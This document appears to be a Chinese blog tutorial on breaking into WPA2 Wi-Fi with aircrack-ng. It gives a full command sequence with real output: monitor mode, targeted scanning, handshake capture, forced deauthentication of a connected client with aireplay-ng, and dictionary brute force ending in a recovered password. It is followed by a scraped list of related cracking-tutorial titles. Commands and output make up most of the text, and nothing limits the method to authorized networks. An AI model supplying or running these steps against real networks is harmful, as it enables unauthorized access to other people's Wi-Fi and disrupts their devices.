1. 安装 aircrack-ng

  • 使用相应包管理工具安装,例如 Debian/Ubuntu 使用 apt 安装:
sudo apt install aircrack-ng

2. 查看可用的无线网卡

使用命令:airmon-ng

netcon@conwlt:~/workspace$ sudo airmon-ngPHY Interface   Driver      Chipsetphy0    wlp8s0      iwlwifi     Intel Corporation Centrino Wireless-N 2230 (rev c4)

根据以上输出,可用的无线网卡为 wlp8s0

3. 指定无线网卡开启监听模式。

使用命令:airmon-ng start <网卡名称>

netcon@conwlt:~/workspace$ sudo airmon-ng start wlp8s0PHY Interface   Driver      Chipsetphy0    wlp8s0      iwlwifi     Intel Corporation Centrino Wireless-N 2230 (rev c4)(mac80211 monitor mode vif enabled for [phy0]wlp8s0 on [phy0]wlp8s0mon)(mac80211 station mode vif disabled for [phy0]wlp8s0)

根据以上输出,已经把 wlp8s0 这块无线网卡开启监听模式,开启后名字是 wlp8s0mon

开启监听模式后无线网卡无法继续连接 wifi,使用后需要关闭监听模式。

4. 扫描附近的无线网络

使用命令:airodump-ng <处于监听模式的网卡名称>

netcon@conwlt:~/workspace$ sudo airodump-ng wlp8s0monCH  5 ][ Elapsed: 12 s ][ 2018-10-07 18:49              BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID22:47:DA:62:2A:F0  -50       51       12    0   6  54e. WPA2 CCMP   PSK  AndroidAP    BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                  22:47:DA:62:2A:F0  AC:BC:32:96:31:8D  -31    0 -24e     0       16   

这一步会输出两个列表,两个列表不停在刷新。

第一个列表表示扫描到的无线网络 AP 信息,会用到以下几列信息:

  • BSSID: 无线 AP 的硬件地址
  • PWR: 信号强度,值是负数,绝对值越小表示信号越强
  • CH: 无线网络信道
  • ENC: 加密方式,我们要破解的是 WPA2
  • ESSID: 无线网络的名称

第二个列表表示某个无线网络中和用户设备的连接信息:

  • BSSID: 无线 AP 的硬件地址
  • STATION: 用户设备的硬件地址

扫描列表会不停刷新,确定最终目标后按 Ctrl-C 退出。

这里仅仅是演示,所以列表只保留了一条结果。

5. 使用参数过滤扫描列表,确定扫描目标

使用命令:airodump-ng -w <扫描结果保存的文件名> -c <无线网络信道> --bssid <目标无线 AP 的硬件地址> <处于监听模式的网卡名称>

netcon@conwlt:~/workspace$ sudo airodump-ng -w android -c 6 --bssid 22:47:DA:62:2A:F0 wlp8s0monCH  5 ][ Elapsed: 12 s ][ 2018-10-07 18:49 ][ WPA handshake: 22:47:DA:62:2A:F0BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID22:47:DA:62:2A:F0  -33 100     1597      387   11   6  54e. WPA2 CCMP   PSK  AndroidAPBSSID              STATION            PWR   Rate    Lost    Frames  Probe                                  22:47:DA:62:2A:F0  AC:BC:32:96:31:8D  -32    1e-24e  1691     2657

刚扫描时看到输出的扫描状态是这样的:CH 5 ][ Elapsed: 12 s ][ 2018-10-07 18:49

只有当扫描状态后面出现 ][ WPA handshake: 22:47:DA:62:2A:F0 后,我们才拿到拿到进行破解的握手包。

扫描过程中如果有用户设备尝试连接 Wi-Fi 时,我们就会拿到握手包。

所以我们可以同时使用 aireplay-ng 对目标设备进行攻击,使其掉线重新连接,这样我们就拿到了握手包。

拿到握手包后按 Ctrl-C 结束扫描即可。

6. 使用 aireplay-ng 对目标设备发起攻击

使用命令:aireplay-ng -<攻击模式> <攻击次数> -a 无线 AP 硬件地址> -c <用户设备硬件地址> <处于监听模式的网卡名称>

netcon@conwlt:~$ sudo aireplay-ng -0 0 -a 22:47:DA:62:2A:F0 -c AC:BC:32:96:31:8D wlp8s0mon
18:57:31  Waiting for beacon frame (BSSID: 22:47:DA:62:2A:F0) on channel 6
18:57:32  Sending 64 directed DeAuth. STMAC: [AC:BC:32:96:31:8D] [41|64 ACKs]
18:57:33  Sending 64 directed DeAuth. STMAC: [AC:BC:32:96:31:8D] [19|121 ACKs]
18:57:33  Sending 64 directed DeAuth. STMAC: [AC:BC:32:96:31:8D] [11|80 ACKs]
...

发起攻击后,当 airodump-ng 成功拿到了握手包,使用 Ctrl-C 退出攻击。

7. 使用 aircrack-ng 暴力破解 Wi-Fi 密码

使用命令:aircrack-ng -w 密码字典 <包含握手包的 cap 文件>

netcon@conwlt:~/workspace$ aircrack-ng -w wpa-dictionary/common.txt android-01.cap
Opening android-01.cap
Read 675 packets.#  BSSID              ESSID                     Encryption1  22:47:DA:62:2A:F0  AndroidAP                 WPA (1 handshake)Choosing first network as target.Opening android-01.cap
Reading packets, please wait...Aircrack-ng 1.2 rc4[00:00:00] 12/2492 keys tested (828.33 k/s) Time left: 2 seconds                                       0.48%KEY FOUND! [ 1234567890 ]Master Key     : A8 70 17 C2 C4 94 12 99 98 4B BB BE 41 23 5C 0D 4A 3D 62 55 85 64 B2 10 11 79 6C 41 1A A2 3B D3 Transient Key  : 58 9D 0D 25 26 81 A9 8E A8 24 AB 1F 40 1A D9 ED EE 10 17 75 F9 F1 01 EE E3 22 A5 09 54 A8 1D E7 28 76 8A 6C 9E FC D3 59 22 B7 82 4E C8 19 62 D9 F3 12 A0 1D E9 A4 7C 4B 85 AF 26 C5 BA 22 42 9A EAPOL HMAC     : 22 C1 BD A7 BB F4 12 A5 92 F6 30 5C F5 D4 EE BE 

根据以上输出,我们已经破解成功!Wi-Fi 密码是:1234567890

8. 无线网卡退出监听模式

使用命令:airmon-ng stop <处于监听模式的无限网卡名称>

netcon@conwlt:~/workspace$ sudo airmon-ng stop wlp8s0monPHY Interface   Driver      Chipsetphy0    wlp8s0mon   iwlwifi     Intel Corporation Centrino Wireless-N 2230 (rev c4)(mac80211 station mode vif enabled on [phy0]wlp8s0)(mac80211 monitor mode vif disabled for [phy0]wlp8s0mon)

破解完成后记得重启网卡
ifconfig name down
ifconfig name up

airmon-ng破解wifi相关推荐

  1. Kali Linux使用基于airmon airodump aircrack破解wifi密码

    AirCrack 套件来破解无线网络的 WEP 密码 最近玩Kali Linux总结一下使用教程 要求: Kali Linux的计算机(我用的是vmware) 要有一个外置的网卡,用于Kali Lin ...

  2. 破解WIFI(wpa/wpa2)

    破解WiFi密码(WPA/WPA2) 如今,绝大部分的WiFi网络都采用了 WPA/WPA2 加密,WEP 加密已经极为罕见.所以本文就给大家介绍如何用 Aircrack-ng 工具包破解 WPA/W ...

  3. 自学python当黑客-用Python做黑客,暴力破解wifi密码

    前几篇文章主要介绍了使用delphi开发后门及简单的远控的知识,有小伙伴说delphi已经过时了没人用了,但是笔者觉得编程语言只是实现功能的一种方式,使用你熟悉或者喜欢的语言即可. 在最近的公司项目开 ...

  4. Mac系统安装Aircrack-ng破解wifi密码(2)

    我们上一篇文章说过如何通过Aircrack-ng, 破解使用WPA/PSK加密方式的路由密码, 这一篇介绍的是使用Aircrack-ng破解使用WEP加密方式的路由密码: WEP和WPA/PSK的区别 ...

  5. 思路+源码,利用Python破解WIFI密码详解,100M的字典已备好

    前言 WIFI破解,Python程序员必学技能.WIFI已经完全普及,现在Python程序员没网,走到哪里都不怕! 很多人学习python,不知道从何学起. 很多人学习python,掌握了基本语法过后 ...

  6. 凯撒密码加密算法python_Python最新暴力破解WiFi,攻破所有密码限制,最强破解!...

    生成密码本 对于这个密码本就是我们常用的密码,一般是有数字.字母和符号组成.而现在呢?我们就用Python生成一个简单的密码本,这里用到的思路主要是穷举法.这里用到的库是itertools,没有的可以 ...

  7. Kali Linux破解WiFi教程

    本文参考暴力法破解wifi笔记文章,并结合实战经验,进行总结归纳.只是提供一个思路,目的是为了提升学习渗透的兴趣,禁止用于非法操作,否则后果自负!!! 1.准备工作 首先需要配备一个外置网卡,然后用虚 ...

  8. Kali Linux破解wifi密码教程(无须外置网卡)

    关键词:Kali Linux.Kali Linux新手教程 Kali Linux学习视频教程:(如失效请在公众号私信我) 链接:https://pan.baidu.com/s/1mILf-H6FsSt ...

  9. 电脑破解wifi密码(至少连过1次的才可以)

    电脑破解wifi密码(至少连过1次的才可以) 连过的wifi密码忘记了怎么办? 只要你电脑连过的都能破解. cmd输入以下内容查看电脑连接过的wifi名字. netsh wlan show profi ...

  10. Kali linux破解Wi-Fi

    微信公众号:乌鸦安全 扫取二维码获取更多信息! 视频版教程: https://www.bilibili.com/video/BV17J411N72A 1.准备工作 首先你得有一个外置网卡,然后用虚拟机 ...

最新文章

  1. 第九章 9.2 数组的方法(Array Methods)
  2. 一张图:AI领域里各领风骚的BAT三巨头
  3. Missing artifact jdk.tools:jdk.tools:jar:1.6
  4. ABAP更改程序的请求包操作
  5. Lambda省略格式Lambda使用前提
  6. redis 源码 zmalloc.c 实现
  7. 服务器硬件监控转载:
  8. Ubuntu 10.10, 11.04, 11.10这三个版本无法从优盘启动
  9. 2013年 833c语言程序 江南大学 (A卷)
  10. Win32项目关于MessageBox参数的详细说明
  11. C++编译器与链接器工作原理
  12. 金蝶kis云+sqlserver报表分析
  13. JavaScript学习(十三)—节点关系
  14. java 不退出_(Java)如果我在其外面点击,JPopupMenu将不会关闭
  15. 如何获取 Instagram 视频以及图片
  16. 对于单峰函数(有唯一极值的函数),黄金分割法比二分法能用更少的搜索次数找到最优解(最值),这对于目标函数不可导时的最优解搜索很有效。
  17. android移动端设计规范,干货|超全面的移动端UI 设计规范整理汇总(下)
  18. 常用英文字体收集备用
  19. 全裸或半裸的大肚照国际接轨 细数女星大尺度斗艳孕照
  20. 支付宝快捷支付接入问题

热门文章

  1. 关于VSCode引用OpenCV模块出现提示Module ‘cv2‘ has no ‘imread‘ member
  2. 基于51单片机水塔水箱液水位WIFI监控报警设计proteus仿真原理图PCB
  3. 【Paper】2021_多智能体系统编队跟踪控制_张晓广
  4. iOS:iOS8开发 深入理解autolayout(3)
  5. java url特殊字符编码_URL编码和解码Java中的特殊字符 - java
  6. Topsis算法(优劣解距离法)——综合评价方法
  7. 歇斯底里的剖析HashMap
  8. php里面怎么设置边框颜色,css怎么设置div边框颜色
  9. Mobox校园云盘一键部署简单高效-完美替换传统FTP
  10. C语言实训——经点小游戏马里奥开发day2